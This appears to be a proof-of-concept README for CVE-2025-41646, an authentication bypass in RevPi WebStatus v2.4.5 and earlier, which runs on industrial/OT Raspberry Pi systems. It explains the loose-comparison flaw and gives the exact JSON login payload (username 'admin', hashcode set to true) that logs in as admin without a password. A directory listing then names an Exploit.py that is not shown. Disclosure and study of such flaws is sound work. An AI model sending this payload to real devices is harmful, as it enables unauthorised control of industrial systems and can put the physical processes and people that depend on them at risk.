CVE-2025-41646 - Critical Authentication bypass# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass
# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC
A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).
---
## 📌 Affected
- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache
---
## 💥 Exploitation
Send a login request with:
```json
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}
[4.0K] /data/pocs/624b66f1afc9f62ddcf9c22ce013ca3263115876
├── [ 701] Exploit.py
└── [ 624] README.md
0 directories, 2 files